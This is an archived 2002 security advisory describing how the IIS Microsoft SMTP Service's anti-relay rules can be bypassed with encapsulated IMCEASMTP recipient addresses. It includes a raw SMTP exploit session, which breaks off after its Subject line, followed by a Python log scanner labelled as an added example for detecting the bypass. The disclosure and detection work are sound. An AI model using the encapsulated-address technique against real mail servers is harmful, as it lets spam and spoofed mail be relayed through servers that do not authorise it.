[NT] IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability
From: support@securiteam.com
Date: 07/12/02
From: support@securiteam.com To: list@securiteam.com Date: Fri, 12 Jul 2002 19:35:41 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability
------------------------------------------------------------------------
SUMMARY
Laurent Frinking of Quark Deutschland GmbH originally discovered this
vulnerability. At that time, the discovery concerned all versions of
Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.
Portcullis has discovered that the Microsoft SMTP Service available with
IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address
vulnerability even with anti-relaying features enabled. This vulnerability
allows hosts that are not authorized to relay e-mail via the SMTP server
to bypass the anti-relay features and send mail to foreign domains.
DETAILS
Impact:
The anti-relay rules will be circumvented, allowing spam and spoofed mail
to be relayed via the SMTP mail server.
Spam Mail:
If the Microsoft IIS SMTP Server is used to relay spam mail, the mail
server could be blackholed, causing disruption to the service.
Spoofed e-mail:
As the Microsoft IIS SMTP Service is most often used in conjunction with
IIS for commercial purposes, this flaw could be used to socially engineer
customers, particularly because spoofed e-mail relayed in this way will
show the trusted web server in the SMTP header.
Exploit:
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
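To spot this bypass in SMTP logs, the Python below (an added example, not part of the original advisory) decodes the IMCEASMTP- local part seen in the session above and flags recipients whose hidden domain is not local. LOCAL_DOMAINS, the function names and the sample lines are assumptions constructed for illustration; decoding every +XX pair as a hex character code generalizes the +40 and +2E shown above.

```python
import re

# Assumption: domains this server legitimately accepts mail for.
LOCAL_DOMAINS = {"victim.co.uk"}

# Constructed sample input, modelled on the RCPT TO lines in the session above.
SAMPLE = [
    "MAIL FROM: test@test.com",
    "RCPT TO: test2@test.com",
    "RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk",
    "RCPT TO: IMCEASMTP-sales+40victim+2Eco+2Euk@victim.co.uk",
]

# An RCPT TO argument whose local part carries the IMCEASMTP- prefix.
RCPT_RE = re.compile(r"RCPT TO:\s*<?(IMCEASMTP-[^@\s>]+)@([^\s>]+)>?", re.I)
PLUS_HEX = re.compile(r"\+([0-9A-Fa-f]{2})")


def decode_imceasmtp(local_part):
    """Return the address hidden in an IMCEASMTP- local part (+XX -> character)."""
    body = local_part[len("IMCEASMTP-"):]
    return PLUS_HEX.sub(lambda m: chr(int(m.group(1), 16)), body)


def find_relay_attempts(lines, local_domains=LOCAL_DOMAINS):
    """Return (line_no, outer_rcpt, inner_rcpt) where the inner domain is foreign."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = RCPT_RE.search(line)
        if not m:
            continue
        inner = decode_imceasmtp(m.group(1))
        # A decoded value without "@" is treated as foreign and flagged too.
        inner_domain = inner.rpartition("@")[2].lower()
        if inner_domain not in local_domains:
            hits.append((no, f"{m.group(1)}@{m.group(2)}", inner))
    return hits


if __name__ == "__main__":
    for no, outer, inner in find_relay_attempts(SAMPLE):
        print(f"line {no}: {outer} hides foreign recipient {inner}")
```

The same decoding can be applied at a mail gateway in front of the server to reject such recipients before they reach the relay check.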
ADDITIONAL INFORMATION
The information has been provided by TLR <TLR@portcullis-security.com>.